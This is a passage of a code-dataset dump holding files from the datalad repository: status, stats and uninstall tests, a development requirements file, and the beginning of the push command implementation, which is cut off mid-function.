the respected file content from the archive at the correct location.\n\nThis special remote is automatically configured and enabled as\n``datalad-archives`` by the ``add-archive-content`` command. This command\nindexes annexed archives, extracts, and registers their content to a\ndataset. File content availability information is recorded in terms of the\n``dl+archive:`` \"URLs\", which are put into the git-annex metadata on a file's\ncontent.\n\n\n.. _git-annex special remote: https://git-annex.branchable.com/special_remotes/\n.. _external special remote protocol: https://git-annex.branchable.com/design/external_special_remote_protocol\n" }, { "alpha_fraction": 0.5828939080238342, "alphanum_fraction": 0.5944206118583679, "avg_line_length": 35.65168380737305, "blob_id": "408be97631ed93b166ddc6fb0b2168479db8ebef", "content_id": "cd10d2193aabaf518d1ec3557f7c9e16e0697056", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16310, "license_type": "permissive", "max_line_length": 85, "num_lines": 445, "path": "/datalad/core/local/tests/test_status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test status command\"\"\"\n\nimport os.path as op\n\nimport datalad.utils as ut\nfrom datalad.api import status\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_dict_equal,\n assert_in,\n assert_in_results,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n has_symlink_capability,\n with_tempfile,\n)\nfrom datalad.utils import (\n chpwd,\n on_windows,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_runnin_on_empty(path=None):\n # empty repo\n repo = AnnexRepo(path, create=True)\n # just wrap with a dataset\n ds = Dataset(path)\n # and run status ... should be good and do nothing\n eq_([], ds.status(result_renderer='disabled'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef test_status_basics(path=None, linkpath=None, otherdir=None):\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(path, target_is_directory=True)\n path = linkpath\n\n with chpwd(path):\n assert_raises(NoDatasetFound, status)\n ds = Dataset(path).create()\n # outcome identical between ds= and auto-discovery\n with chpwd(path):\n assert_raises(IncompleteResultsError, status, path=otherdir)\n stat = status(result_renderer='disabled')\n eq_(stat, ds.status(result_renderer='disabled'))\n assert_status('ok', stat)\n # we have a bunch of reports (be vague to be robust to future changes\n assert len(stat) > 2\n # check the composition\n for s in stat:\n eq_(s['status'], 'ok')\n eq_(s['action'], 'status')\n eq_(s['state'], 'clean')\n eq_(s['type'], 'file')\n assert_in('gitshasum', s)\n assert_in('bytesize', s)\n eq_(s['refds'], ds.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_status_nods(path=None, otherpath=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.status(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n status='error',\n message=('path not underneath the reference dataset %s', ds.path))\n otherds = Dataset(otherpath).create()\n assert_result_count(\n ds.status(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n path=otherds.path,\n status='error',\n message=('path not underneath the reference dataset %s', ds.path))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_status(_path=None, linkpath=None):\n # do the setup on the real path, not the symlink, to have its\n # bugs not affect this test of status()\n ds = get_deeply_nested_structure(str(_path))\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(_path, target_is_directory=True)\n path = linkpath\n else:\n path = _path\n\n ds = Dataset(path)\n if has_symlink_capability():\n assert ds.pathobj != ds.repo.pathobj\n\n # spotcheck that annex status reporting and availability evaluation\n # works\n assert_result_count(\n ds.status(annex='all', result_renderer='disabled'),\n 1,\n path=str(ds.pathobj / 'subdir' / 'annexed_file.txt'),\n key='MD5E-s5--275876e34cf609db118f3d84b799a790.txt',\n has_content=True,\n objloc=str(ds.repo.pathobj / '.git' / 'annex' / 'objects' /\n # hashdir is different on windows\n ('f33' if ds.repo.is_managed_branch() else '7p') /\n ('94b' if ds.repo.is_managed_branch() else 'gp') /\n 'MD5E-s5--275876e34cf609db118f3d84b799a790.txt' /\n 'MD5E-s5--275876e34cf609db118f3d84b799a790.txt'))\n\n plain_recursive = ds.status(recursive=True, result_renderer='disabled')\n # check integrity of individual reports\n for res in plain_recursive:\n # anything that is an \"intended\" symlink should be reported\n # as such\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n # every item must report its parent dataset\n assert_in('parentds', res)\n\n # bunch of smoke tests\n # query of '.' is same as no path\n eq_(plain_recursive, ds.status(path='.', recursive=True,\n result_renderer='disabled'))\n # duplicate paths do not change things\n eq_(plain_recursive, ds.status(path=['.', '.'], recursive=True,\n result_renderer='disabled'))\n # neither do nested paths\n eq_(plain_recursive,\n ds.status(path=['.', 'subds_modified'], recursive=True,\n result_renderer='disabled'))\n # when invoked in a subdir of a dataset it still reports on the full thing\n # just like `git status`, as long as there are no paths specified\n with chpwd(op.join(path, 'directory_untracked')):\n plain_recursive = status(recursive=True, result_renderer='disabled')\n # should be able to take absolute paths and yield the same\n # output\n eq_(plain_recursive, ds.status(path=ds.path, recursive=True,\n result_renderer='disabled'))\n\n # query for a deeply nested path from the top, should just work with a\n # variety of approaches\n rpath = op.join('subds_modified', 'subds_lvl1_modified',\n OBSCURE_FILENAME + u'_directory_untracked')\n apathobj = ds.pathobj / rpath\n apath = str(apathobj)\n # ds.repo.pathobj will have the symlink resolved\n arealpath = ds.repo.pathobj / rpath\n # TODO include explicit relative path in test\n for p in (rpath, apath, arealpath, None):\n if p is None:\n # change into the realpath of the dataset and\n # query with an explicit path\n with chpwd(ds.repo.path):\n res = ds.status(path=op.join('.', rpath), result_renderer='disabled')\n else:\n res = ds.status(path=p, result_renderer='disabled')\n assert_result_count(\n res,\n 1,\n state='untracked',\n type='directory',\n refds=ds.path,\n # path always comes out a full path inside the queried dataset\n path=apath,\n )\n\n assert_result_count(\n ds.status(\n recursive=True, result_renderer='disabled'),\n 1,\n path=apath)\n # limiting recursion will exclude this particular path\n assert_result_count(\n ds.status(\n recursive=True,\n recursion_limit=1, result_renderer='disabled'),\n 0,\n path=apath)\n # negative limit is unlimited limit\n eq_(\n ds.status(recursive=True, recursion_limit=-1, result_renderer='disabled'),\n ds.status(recursive=True, result_renderer='disabled')\n )\n\n # check integrity of individual reports with a focus on how symlinks\n # are reported in annex-mode\n # this is different from plain git-mode, which reports types as-is\n # from the git record\n for res in ds.status(recursive=True, annex='basic',\n result_renderer='disabled'):\n # anything that is an \"intended\" symlink should be reported\n # as such. In contrast, anything that is a symlink for mere\n # technical reasons (annex using it for something in some mode)\n # should be reported as the thing it is representing (i.e.\n # a file)\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n else:\n assert res['type'] != 'symlink', res\n\n@with_tempfile(mkdir=True)\ndef test_untracked_annex_query(path=None):\n # test for #7032\n ds = Dataset(path).create()\n (ds.pathobj / 'untracked_file.txt').write_text(u'dummy')\n res = ds.status(annex='basic', path='untracked_file.txt')\n assert_not_in_results(\n res,\n error_message='File unknown to git',\n )\n\n\n# https://github.com/datalad/datalad-revolution/issues/64\n# breaks when the tempdir is a symlink\n@with_tempfile(mkdir=True)\ndef test_subds_status(path=None):\n ds = Dataset(path).create()\n subds = ds.create('subds')\n assert_repo_status(ds.path)\n subds.create('someotherds')\n assert_repo_status(subds.path)\n assert_repo_status(ds.path, modified=['subds'])\n assert_result_count(\n ds.status(path='subds', result_renderer='disabled'),\n 1,\n # must be modified, not added (ds was clean after it was added)\n state='modified',\n type='dataset',\n path=subds.path,\n refds=ds.path)\n\n # path=\".\" gets treated as \"this dataset's content\" without requiring a\n # trailing \"/\"...\n assert_result_count(\n subds.status(path=\".\", result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n # ... and so does path=<path/to/ds>.\n assert_result_count(\n subds.status(path=subds.path, result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n assert_result_count(\n subds.status(path=op.join(subds.path, op.pardir, \"subds\"),\n result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n assert_result_count(\n subds.status(path=op.join(subds.path, op.curdir),\n result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n\n@with_tempfile\ndef test_status_symlinked_dir_within_repo(path=None):\n if not has_symlink_capability():\n raise SkipTest(\"Can't create symlinks\")\n # <path>\n # |-- bar -> <path>/foo\n # `-- foo\n # `-- f\n ds = Dataset(path).create()\n foo = ds.pathobj / \"foo\"\n foo.mkdir()\n (foo / \"f\").write_text(\"content\")\n (ds.pathobj / \"bar\").symlink_to(foo, target_is_directory=True)\n ds.save()\n bar_f = ds.pathobj / \"bar\" / \"f\"\n\n def call():\n return ds.status(path=[bar_f], annex=\"availability\",\n on_failure=\"ignore\", result_renderer='disabled')\n\n if ds.repo.git_annex_version < \"8.20200522\" \\\n or (on_windows and ds.repo.git_annex_version < \"10.20220525\"):\n # version for windows is an approx guess, but stopped happening\n # somewhere around 10.20220505-g3b83224e5 may be.\n # see https://github.com/datalad/datalad/issues/6849\n assert_result_count(call(), 0)\n elif ds.repo.git_annex_version < '10.20220222':\n # As of 2a8fdfc7d (Display a warning message when asked to operate on a\n # file inside a symlinked directory, 2020-05-11), git-annex will error.\n with assert_raises(CommandError):\n call()\n elif '10.20220222' <= ds.repo.git_annex_version < '10.20220322':\n # No error on annex' side since 10.20220222;\n # However, we'd now get something like this:\n # > git annex find bar/f\n # error: pathspec 'bar/f' did not match any file(s) known to git\n # Did you forget to 'git add'?\n #\n # But exists zero until 10.20220322!\n assert_result_count(call(), 0)\n else:\n res = call()\n assert_result_count(res, 1, status='error', state='unknown',\n path=str(bar_f))\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_paths_by_ds(path=None, otherdspath=None):\n otherds = Dataset(otherdspath).create()\n ds = get_deeply_nested_structure(path)\n\n # for testing below, a shortcut\n subds_modified = Dataset(ds.pathobj / 'subds_modified')\n\n # check docstrong of get_deeply_nested_structure() to understand\n # what is being tested here\n testcases = (\n # (\n # (<dataset_arg>, <path arg>),\n # {<path by ds dict>}\n # [<error list>]\n # ),\n\n # find main dataset, pass-through arbitrary arguments, if no paths\n # go in, also no paths come out\n ((path, None), {ds.pathobj: None}, []),\n # a simple path in the rootds, stays just that, not traversal\n # into files underneaths\n ((ds, ['subdir']), {ds.pathobj: [ds.pathobj / 'subdir']}, []),\n # same for files, any number,\n # one record per dataset with multiple files\n ((ds, [op.join('subdir', 'git_file.txt'), 'directory_untracked']),\n {ds.pathobj: [ds.pathobj / 'directory_untracked',\n ds.pathobj / 'subdir' / 'git_file.txt']},\n []),\n # same for a subdataset root -- still reported as part of\n # the superdataset!\n ((ds, ['subds_modified']),\n {ds.pathobj: [subds_modified.pathobj]},\n []),\n # but not with a trailing slash, then it is the subdataset root\n # itself that becomes the record!!!\n ((ds, ['subds_modified' + op.sep]),\n {subds_modified.pathobj: [subds_modified.pathobj]},\n []),\n # however, regardless of the path syntax, each behavior can be forced\n ((ds, ['subds_modified'], 'sub'),\n {subds_modified.pathobj: [subds_modified.pathobj]},\n []),\n ((ds, ['subds_modified' + op.sep], 'super'),\n {ds.pathobj: [subds_modified.pathobj]},\n []),\n # subdataset content is sorted into a subdataset record\n ((ds, [op.join('subds_modified', 'subdir')]),\n {subds_modified.pathobj: [ds.pathobj / 'subds_modified' / 'subdir']},\n []),\n # content from different datasets ends up in different records\n ((ds, [op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir'),\n op.join('subds_modified', 'subds_lvl1_modified')]),\n {ds.pathobj: [ds.pathobj / 'subdir' / 'git_file.txt'],\n subds_modified.pathobj: [\n subds_modified.pathobj / 'subdir',\n subds_modified.pathobj / 'subds_lvl1_modified']},\n []),\n # paths not matching existing content are no problem\n ((ds, ['doesnotexist',\n op.join('subdir', 'nothere'),\n op.join('subds_modified', 'subdir', 'gone')]),\n {ds.pathobj: [ds.pathobj / 'doesnotexist',\n ds.pathobj / 'subdir' / 'nothere'],\n subds_modified.pathobj: [\n subds_modified.pathobj / 'subdir' / 'gone']},\n []),\n #\n # now error case\n #\n # a path that does sort under the root dataset\n ((path, [otherds.pathobj / 'totally' / 'different']),\n {},\n [otherds.pathobj / 'totally' / 'different']),\n )\n # evaluate the test cases\n for inp, pbd_target, error_target in testcases:\n paths_by_ds, errors = get_paths_by_ds(ds, *inp)\n assert_dict_equal(pbd_target, paths_by_ds)\n eq_(error_target, errors)\n\n # lastly, some more specialized test\n # paths get collapsed into dataset records, even when the path\n # order is not presorted to match individual datasets sequentially\n paths_by_ds, errors = get_paths_by_ds(\n ds, ds, [\n op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir'),\n op.join('subdir', 'annexed_file.txt'),\n ])\n eq_(\n list(paths_by_ds.keys()),\n [ds.pathobj, subds_modified.pathobj]\n )\n # result order (top-level first) is stable, even when a path comes first\n # that sorts later. Also mixed types are not a problem\n paths_by_ds, errors = get_paths_by_ds(\n ds, ds, [\n ds.pathobj / 'subds_modified' / 'subdir',\n op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir', 'annexed_file.txt'),\n ])\n eq_(\n list(paths_by_ds.keys()),\n [ds.pathobj, subds_modified.pathobj]\n )\n" }, { "alpha_fraction": 0.5980921983718872, "alphanum_fraction": 0.6270270347595215, "avg_line_length": 31.09183692932129, "blob_id": "88bdbf39b1f035180373c2bf85eb703fedef901e", "content_id": "2715ec14700bf69328abb7b08a5beba3790b4b8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3145, "license_type": "permissive", "max_line_length": 101, "num_lines": 98, "path": "/datalad/support/tests/test_stats.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_not_equal,\n assert_raises,\n)\nfrom ..stats import (\n _COUNTS,\n ActivityStats,\n)\n\n\ndef test_ActivityStats_basic():\n stats = ActivityStats()\n assert_raises(AttributeError, setattr, stats, \"unknown_attribute\", 1)\n\n for c in _COUNTS:\n assert_equal(getattr(stats, c), 0)\n\n stats.files += 1\n assert_equal(stats.files, 1)\n stats.increment('files')\n assert_equal(stats.files, 2)\n\n assert_equal(stats.as_dict()['files'], 2)\n # smoke tests\n assert_equal(stats.as_str(), stats.as_str(mode='full'))\n assert_equal(len(stats.as_str(mode='line').split('\\n')), 1)\n\n assert_in('files=2', repr(stats))\n stats.reset()\n for c in _COUNTS:\n assert_equal(getattr(stats, c), 0)\n\n # Check a copy of stats\n stats_total = stats.get_total()\n assert_equal(stats_total.files, 2)\n stats.files += 1\n assert_equal(stats.files, 1)\n assert_equal(stats_total.files, 2) # shouldn't change -- a copy!\n\n # Let's add some merges\n stats.merges.append(('upstream', 'master'))\n stats_total = stats.get_total()\n assert_equal(stats_total.merges, stats.merges)\n\n assert_equal(stats.as_str(), \"\"\"Files processed: 1\nBranches merged: upstream->master\"\"\")\n assert_equal(stats.as_str(mode='line'), \"Files processed: 1, Branches merged: upstream->master\")\n\n stats.urls += 2\n stats.downloaded += 1\n stats.downloaded_size += 123456789 # will invoke formatter\n assert_in(\"size: 123.5 MB\", stats.as_str())\n\ndef test_ActivityStats_comparisons():\n stats1 = ActivityStats()\n stats2 = ActivityStats()\n assert_equal(stats1, stats2)\n stats1.files += 1\n assert_not_equal(stats1, stats2)\n\n # if we reset -- should get back the same although totals should be different\n stats1.reset()\n assert_equal(stats1.as_str(), stats2.as_str())\n assert_equal(stats1, stats2)\n assert_not_equal(stats1.get_total(), stats2.get_total())\n #stats1.reset(full=True)\n #assert_equal(stats1, stats2)\n\ndef test_add():\n stats1 = ActivityStats()\n stats2 = ActivityStats()\n stats1.files += 1\n stats2.files += 1\n stats2.urls += 1\n assert_equal(stats1, ActivityStats(files=1))\n assert_equal(stats2, ActivityStats(files=1, urls=1))\n\n stats1 += stats2\n assert_equal(stats1, ActivityStats(files=2, urls=1))\n assert_equal(stats1.get_total(), ActivityStats(files=2, urls=1))\n\n stats3 = stats1 + stats2\n # no changes to stats1 or stats2\n assert_equal(stats1, ActivityStats(files=2, urls=1))\n assert_equal(stats1.get_total(), ActivityStats(files=2, urls=1))\n assert_equal(stats2, ActivityStats(files=1, urls=1))\n assert_equal(stats3.get_total(), ActivityStats(files=3, urls=2))\n" }, { "alpha_fraction": 0.7488788962364197, "alphanum_fraction": 0.7488788962364197, "avg_line_length": 54.75, "blob_id": "c2270506a53bee9b47fb50455ee4dca9da315d9a", "content_id": "1fb3115d7130ecd55cecb9afcad34cbabc2a5809", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 223, "license_type": "permissive", "max_line_length": 88, "num_lines": 4, "path": "/requirements-devel.txt", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Theoretically we don't want -e here but ATM pip would puke if just .[full] is provided\n# Since we use requirements.txt ATM only for development IMHO it is ok but\n# we need to figure out/complaint to pip folks\n-e .[devel]\n" }, { "alpha_fraction": 0.5580029487609863, "alphanum_fraction": 0.5624082088470459, "avg_line_length": 26.239999771118164, "blob_id": "f7ccc300e97bbba3a68caaeed3349914d08f7439", "content_id": "193fbc456827cbee82a5ca29ce6835defc92187e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 681, "license_type": "permissive", "max_line_length": 79, "num_lines": 25, "path": "/datalad/distribution/tests/test_uninstall.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test uninstall action\n\n\"\"\"\n\nimport pytest\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n with_tempfile,\n)\n\n\[email protected](\"ignore: The `uninstall` command is deprecated\")\n@with_tempfile()\ndef test_uninstall_uninstalled(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.uninstall)\n" }, { "alpha_fraction": 0.565045177936554, "alphanum_fraction": 0.5674326419830322, "avg_line_length": 38.211700439453125, "blob_id": "e1667e18bf6ad62e3b3d265dc9c3d84f96e1792b", "content_id": "e352987cb125304e3854c03e2a990648ce67ba85", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36859, "license_type": "permissive", "max_line_length": 99, "num_lines": 940, "path": "/datalad/core/distributed/push.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface for dataset (component) pushing\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom itertools import chain\nimport logging\nimport re\n\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_limit,\n recursion_flag,\n)\nfrom datalad.interface.utils import render_action_summary\nfrom datalad.interface.results import annexjson2result\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import (\n AnnexRepo,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n EnsureChoice,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.utils import (\n Path,\n ensure_list,\n todo_interface_for_extensions,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.core.local.diff import diff_dataset\n\n\nlgr = logging.getLogger('datalad.core.distributed.push')\n\n\n@build_doc\nclass Push(Interface):\n \"\"\"Push a dataset to a known :term:`sibling`.\n\n This makes a saved state of a dataset available to a sibling or special\n remote data store of a dataset. Any target sibling must already exist and\n be known to the dataset.\n\n || REFLOW >>\n By default, all files tracked in the last saved state (of the current\n branch) will be copied to the target location. Optionally, it is possible\n to limit a push to changes relative to a particular point in the version\n history of a dataset (e.g. a release tag) using the\n [CMD: --since CMD][PY: since PY] option in conjunction with the\n specification of a reference dataset. In recursive mode subdatasets will also be\n evaluated, and only those subdatasets are pushed where a change was\n recorded that is reflected in the current state of the top-level reference\n dataset.\n << REFLOW ||\n\n .. note::\n Power-user info: This command uses :command:`git push`, and :command:`git\n annex copy` to push a dataset. Publication targets are either configured\n remote Git repositories, or git-annex special remotes (if they support\n data upload).\n \"\"\"\n\n # TODO add examples\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to push\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n to=Parameter(\n args=(\"--to\",),\n metavar='SIBLING',\n doc=\"\"\"name of the target sibling. If no name is given an attempt is\n made to identify the target based on the dataset's configuration\n (i.e. a configured tracking branch, or a single sibling that is\n configured for push)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n since=Parameter(\n args=(\"--since\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"specifies commit-ish (tag, shasum, etc.) from which to look for\n changes to decide whether pushing is necessary.\n If '^' is given, the last state of the current branch at the sibling\n is taken as a starting point.\"\"\"),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n doc=\"\"\"path to constrain a push to. If given, only\n data or changes for those paths are considered for a push.\"\"\",\n nargs='*',\n constraints=EnsureStr() | EnsureNone()),\n data=Parameter(\n args=(\"--data\",),\n doc=\"\"\"what to do with (annex'ed) data. 'anything' would cause\n transfer of all annexed content, 'nothing' would avoid call to\n `git annex copy` altogether. 'auto' would use 'git annex copy' with\n '--auto' thus transferring only data which would satisfy \"wanted\"\n or \"numcopies\" settings for the remote (thus \"nothing\" otherwise).\n 'auto-if-wanted' would enable '--auto' mode only if there is a \n \"wanted\" setting for the remote, and transfer 'anything' otherwise.\n \"\"\",\n constraints=EnsureChoice(\n 'anything', 'nothing', 'auto', 'auto-if-wanted')),\n force=Parameter(\n # multi-mode option https://github.com/datalad/datalad/issues/3414\n args=(\"-f\", \"--force\",),\n doc=\"\"\"force particular operations, possibly overruling safety\n protections or optimizations: use --force with git-push ('gitpush');\n do not use --fast with git-annex copy ('checkdatapresent');\n combine all force modes ('all').\"\"\",\n constraints=EnsureChoice(\n 'all', 'gitpush', 'checkdatapresent', None)),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n jobs=jobs_opt,\n )\n\n # Desired features:\n # - let Git do it's thing (push multiple configured refs without the need\n # to specific anything on the command line\n # - compilication: we need publication dependencies (i.e. publish what\n # would be published by Git to a different remote first, hence we\n # cannot simply watch Git do it, and later act on it.)\n # - https://github.com/datalad/datalad/issues/1284\n # - https://github.com/datalad/datalad/issues/4006\n # - make differences between remotes and various types of special remotes\n # opaque\n # - https://github.com/datalad/datalad/issues/3127\n # - informative and comprehensive (error) reporting\n # - https://github.com/datalad/datalad/issues/2000\n # - https://github.com/datalad/datalad/issues/1682\n # - https://github.com/datalad/datalad/issues/2029\n # - https://github.com/datalad/datalad/issues/2855\n # - https://github.com/datalad/datalad/issues/3412\n # - https://github.com/datalad/datalad/issues/3424\n # - ensure robust behavior in multi-lateral push scenarios (updating\n # a dataset that was updated by a 3rd-party after the last known\n # fetched change\n # - https://github.com/datalad/datalad/issues/2636\n # - should NOT mimic `publish` and that it mixes `create-sibling` and\n # `push` into a single operation. This would fold the complexity\n # of all possible ways a local dataset hierarchy could possibly\n # connected to remote ends into this command. It would be lost battle\n # from the start.\n # - not tackle: https://github.com/datalad/datalad/issues/2186\n # - maintain standard setup, and not reflect procedural aspects\n # onto the resulting outcomes\n # - https://github.com/datalad/datalad/issues/2001\n # - do a straight push, nothing like 'sync'. If a remote has something that\n # needs merging first, fail and let users update. Any diff we are missing\n # locally can impact decision making via --since and friends.\n\n @staticmethod\n @datasetmethod(name='push')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n to=None,\n since=None,\n data='auto-if-wanted',\n force=None,\n recursive=False,\n recursion_limit=None,\n jobs=None):\n # push uses '^' to annotate the previous pushed committish, and None for default\n # behavior. '' was/is (to be deprecated) used in `publish`. Alert user about the mistake\n if since == '':\n raise ValueError(\"'since' should point to commitish or use '^'.\")\n # we resolve here, because we need to perform inspection on what was given\n # as an input argument further down\n paths = [resolve_path(p, dataset) for p in ensure_list(path)]\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='push')\n ds_repo = ds.repo\n\n res_kwargs = dict(\n action='publish',\n refds=ds.path,\n logger=lgr,\n )\n\n get_remote_kwargs = {'exclude_special_remotes': False} \\\n if isinstance(ds_repo, AnnexRepo) else {}\n if to and to not in ds_repo.get_remotes(**get_remote_kwargs):\n # get again for proper error:\n sr = ds_repo.get_remotes(**get_remote_kwargs)\n # yield an error result instead of raising a ValueError,\n # to enable the use case of pushing to a target that\n # a superdataset doesn't know, but some subdatasets to\n # (in combination with '--on-failure ignore')\n yield dict(\n res_kwargs,\n status='error',\n path=ds.path,\n message=\"Unknown push target '{}'. {}\".format(\n to,\n 'Known targets: {}.'.format(', '.join(repr(s) for s in sr))\n if sr\n else 'No targets configured in dataset.'))\n return\n if since == '^':\n # figure out state of remote branch and set `since`\n since = _get_corresponding_remote_state(ds_repo, to)\n if not since:\n lgr.info(\n \"No tracked remote for active branch, \"\n \"detection of last pushed state not in effect.\")\n elif since:\n # will blow with ValueError if unusable\n ds_repo.get_hexsha(since)\n\n\n # obtain a generator for information on the datasets to process\n # idea is to turn the `paths` argument into per-dataset\n # content listings that can be acted upon\n ds_spec = _datasets_since_(\n # important to pass unchanged dataset arg\n dataset,\n since,\n paths,\n recursive,\n recursion_limit)\n\n # instead of a loop, this could all be done in parallel\n matched_anything = False\n for dspath, dsrecords in ds_spec:\n matched_anything = True\n lgr.debug('Pushing Dataset at %s', dspath)\n pbars = {}\n yield from _push(\n dspath, dsrecords, to, data, force, jobs, res_kwargs.copy(), pbars,\n got_path_arg=True if path else False)\n # take down progress bars for this dataset\n for i, ds in pbars.items():\n log_progress(lgr.info, i, 'Finished push of %s', ds)\n if not matched_anything:\n potential_remote = False\n if not to and len(paths) == 1:\n # if we get a remote name without --to, provide a hint\n sr = ds_repo.get_remotes(**get_remote_kwargs)\n potential_remote = [\n p for p in ensure_list(path) if p in sr\n ]\n if potential_remote:\n if len(potential_remote) == 1:\n # present as a single value to make hint even more human\n # friendly\n potential_remote = potential_remote[0]\n hint = \"{} matches a sibling name and not a path. \" \\\n \"Forgot --to?\".format(potential_remote)\n yield dict(\n res_kwargs,\n status='notneeded',\n message=hint,\n hints=hint,\n type='dataset',\n path=ds.path,\n )\n # there's no matching path and we have generated a hint on\n # fixing the call - we can return now\n return\n yield dict(\n res_kwargs,\n status='notneeded',\n message='Given constraints did not match any changes to publish',\n type='dataset',\n path=ds.path,\n )\n\n custom_result_summary_renderer_pass_summary = True\n\n @staticmethod\n def custom_result_summary_renderer(results, action_summary): # pragma: more cover\n render_action_summary(action_summary)\n # report on any hints at the end\n # get all unique hints\n hints = set([r.get('hints', None) for r in results])\n hints = [hint for hint in hints if hint is not None]\n if hints:\n from datalad.ui import ui\n from datalad.support import ansi_colors\n intro = ansi_colors.color_word(\n \"Hints: \",\n ansi_colors.YELLOW)\n ui.message(intro)\n [ui.message(\"{}: {}\".format(\n ansi_colors.color_word(id + 1, ansi_colors.YELLOW), hint))\n for id, hint in enumerate(hints)]\n\n\n\ndef _datasets_since_(dataset, since, paths, recursive, recursion_limit):\n \"\"\"Generator\"\"\"\n # rely on diff() reporting sequentially across datasets\n cur_ds = None\n ds_res = None\n for res in diff_dataset(\n dataset=dataset,\n fr=since,\n # we never touch unsaved content\n to='HEAD',\n constant_refs=False,\n path=paths,\n # we need to know what is around locally to be able\n # to report something that should have been pushed\n # but could not, because we don't have a copy.\n # however, getting this info here is needlessly\n # expensive, we will do it at the latest possible stage\n # in _push_data()\n annex=None,\n recursive=recursive,\n recursion_limit=recursion_limit,\n 